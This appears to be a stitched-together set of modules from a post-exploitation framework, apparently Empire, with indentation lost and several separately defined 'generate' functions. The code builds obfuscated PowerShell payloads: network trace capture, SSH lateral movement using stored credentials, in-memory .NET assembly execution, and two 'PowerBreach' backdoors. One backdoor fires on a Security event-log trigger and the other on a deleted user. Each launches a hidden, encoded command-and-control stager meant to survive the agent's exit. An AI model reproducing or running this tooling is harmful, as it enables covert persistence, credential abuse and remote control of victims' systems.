max_size = params['MaxSize']
trace_file = params['TraceFile']
persistent = params['Persistent']
stop_trace = params['StopTrace']
if stop_trace.lower() == "true":
script = "netsh trace stop"
else:
script = "netsh trace start capture=yes traceFile=%s" %(trace_file)
if max_size != "":
script += " maxSize=%s" %(max_size)
if persistent != "":
script += " persistent=yes"
# Get the random function name generated at install and patch the stager with the proper function name
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/lateral_movement/Invoke-SSHCommand.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = "\nInvoke-SSHCommand "
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.username != "":
params["Username"] = str(cred.username)
if cred.password != "":
params["Password"] = str(cred.password)
if params["Username"] == "":
return handle_error_message(
"[!] Either 'CredId' or Username/Password must be specified.")
if params["Password"] == "":
return handle_error_message(
"[!] Either 'CredId' or Username/Password must be specified.")
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Helper function for arguments
def parse_assembly_args(args):
stringlist = []
stringbuilder = ""
inside_quotes = False
if not args:
return '""'
for ch in args:
if ch == " " and not inside_quotes:
stringlist.append(stringbuilder) # Add finished string to the list
stringbuilder = "" # Reset the string
elif ch == '"':
inside_quotes = not inside_quotes
else: # Ch is a normal character
stringbuilder += ch # Add next ch to string
# Finally...
stringlist.append(stringbuilder)
for arg in stringlist:
if arg == "":
stringlist.remove(arg)
argument_string = '","'.join(stringlist)
# Replace backslashes with a literal backslash so an operator can type a file path like C:\windows\system32 instead of C:\\windows\\system32
argument_string = argument_string.replace("\\", "\\\\")
return f'\"{argument_string}\"'
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-Assembly.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
try:
with open(f"{main_menu.installPath}/downloads/{params['File']}", 'rb') as f:
assembly_data = f.read()
except:
return handle_error_message("[!] Could not read .NET assembly path at: " + str(params['Arguments']))
encode_assembly = helpers.encode_base64(assembly_data).decode('UTF-8')
# Do some parsing on the operator's arguments so it can be formatted for Powershell
if params['Arguments'] != '':
assembly_args = parse_assembly_args(params['Arguments'])
script_end = f'\nInvoke-Assembly -ASMdata "{encode_assembly}"'
# Add any arguments to the end execution of the script
if params['Arguments'] != '':
script_end += " -" + "Arguments" + " " + assembly_args
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
script = """
function Invoke-EventLogBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[string]$Trigger="HACKER",
[Parameter(Mandatory=$False,Position=2)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=3)]
[int]$Sleep=30
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
$d = Get-Date
$NewEvents = Get-WinEvent -FilterHashtable @{logname='Security'; StartTime=$d.AddSeconds(-$Sleep)} -ErrorAction SilentlyContinue | fl Message | Out-String
if($NewEvents -match $Trigger)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-EventLogBackdoor"""
listener_name = params['Listener']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# set the listener value for the launcher
stager = main_menu.stagers.stagers["multi/launcher"]
stager.options['Listener'] = listener_name
stager.options['Base64'] = "False"
# and generate the code
stager_code = stager.generate()
if stager_code == "":
return handle_error_message('[!] Error in launcher generation.')
else:
script = script.replace("REPLACE_LAUNCHER", stager_code)
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
outFile = params['OutFile']
if outFile != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
os.makedirs(os.path.dirname(outFile))
f = open(outFile, 'w')
f.write(script)
f.close()
return handle_error_message("[+] PowerBreach deaduser backdoor written to " + outFile)
script = data_util.keyword_obfuscation(script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stager_code = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stager_code.split(" ")
# set up the start-process command so no new windows appears
script = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:]))
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script
def _generate_script_powershell(self, module: PydanticModule, params: Dict, obfuscate=False, obfuscate_command='') \
-> Tuple[Optional[str], Optional[str]]:
module_source = module.script_path
preobfuscated = False
if module_source:
# Get preobfuscated module code
if obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
preobfuscated = True
module_source = obfuscated_module_source
# read obfuscated or unobfuscated scripts
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return None, f"Could not read module source path at: {module_source}"
# obfuscate script if global obfuscation is on and preobfuscated script doesnt exist
if obfuscate and not preobfuscated:
script = data_util.obfuscate(
installPath=self.main_menu.installPath,
psScript=module_code,
obfuscationCommand=obfuscate_command)
else:
script = module_code
# Check if global obfuscation is on and obfuscate powershell code from yamls
else:
if obfuscate:
script = data_util.obfuscate(
installPath=self.main_menu.installPath,
psScript=module.script,
obfuscationCommand=obfuscate_command)
else:
script = module.script
script_end = f" {module.script_end} "
option_strings = []
# This is where the code goes for all the modules that do not have a custom generate function.
for key, value in params.items():
if key.lower() not in ["agent", "computername", "outputfunction"]:
if value and value != '':
if value.lower() == "true":
# if we're just adding a switch
# wannabe mustache templating.
# If we want to get more advanced, we can import a library for it.
this_option = module.advanced.option_format_string_boolean \
.replace('{{ KEY }}', str(key)) \
.replace('{{KEY}}', str(key))
option_strings.append(f'{this_option}')
else:
this_option = module.advanced.option_format_string \
.replace('{{ KEY }}', str(key)) \
.replace('{{KEY}}', str(key)) \
.replace('{{ VALUE }}', str(value)) \
.replace('{{VALUE}}', str(value))
option_strings.append(f'{this_option}')
script_end = script_end \
.replace('{{ PARAMS }}', ' '.join(option_strings)) \
.replace('{{PARAMS}}', ' '.join(option_strings)) \
.replace('{{ OUTPUT_FUNCTION }}', params.get('OutputFunction', 'Out-String')) \
.replace('{{OUTPUT_FUNCTION}}', params.get('OutputFunction', 'Out-String'))
# obfuscate the invoke command and append to script
if obfuscate:
script_end = data_util.obfuscate(
self.main_menu.installPath,
psScript=script_end,
obfuscationCommand=obfuscate_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script, None
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
script = """
function Invoke-DeadUserBackdoor
{
Param(
[Parameter(Mandatory=$False,Position=1)]
[int]$Timeout=0,
[Parameter(Mandatory=$False,Position=2)]
[int] $Sleep=30,
[Parameter(Mandatory=$True,Position=3)]
[string] $Username,
[Parameter(Mandatory=$False,Position=4)]
[switch] $Domain
)
$running=$True
$match =""
$starttime = Get-Date
while($running)
{
if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
{
$running=$False
}
if($Domain)
{
$UserSearcher = [adsisearcher]"(&(samAccountType=805306368)(samAccountName=*$UserName*))"
$UserSearcher.PageSize = 1000
$count = @($UserSearcher.FindAll()).Count
if($count -eq 0)
{
Write-Verbose "Domain user $Username not found!"
$match=$True
}
}
else
{
$comp = $env:computername
[ADSI]$server="WinNT://$comp"
$usercheck = $server.children | where{$_.schemaclassname -eq "user" -and $_.name -eq $Username}
if(-not $usercheck)
{
$match=$True
}
}
if($match)
{
REPLACE_LAUNCHER
$running=$False
}
else
{
Start-Sleep -s $Sleep
}
}
}
Invoke-DeadUserBackdoor"""
listener_name = params['Listener']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# set the listener value for the launcher
stager = main_menu.stagers.stagers["multi/launcher"]
stager.options['Listener'] = listener_name
stager.options['Base64'] = "False"
# and generate the code
stager_code = stager.generate()
if stager_code == "":
return handle_error_message('[!] Error creating stager')
else:
script = script.replace("REPLACE_LAUNCHER", stager_code)
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values)
out_file = params['OutFile']
if out_file != '':
# make the base directory if it doesn't exist
if not os.path.exists(os.path.dirname(out_file)) and os.path.dirname(out_file) != '':
os.makedirs(os.path.dirname(out_file))
f = open(out_file, 'w')
f.write(script)
f.close()
return handle_error_message("[+] PowerBreach deaduser backdoor written to " + out_file)
script = data_util.keyword_obfuscation(script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
launcher = helpers.powershell_launcher(script, modifiable_launcher)
stager_code = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
parts = stager_code.split(" ")
# set up the start-process command so no new windows appears
script = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:]))
if main_menu.obfuscate:
script = data_util.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=main_menu.obfuscateCommand)
script = data_util.keyword_obfuscation(script)
return script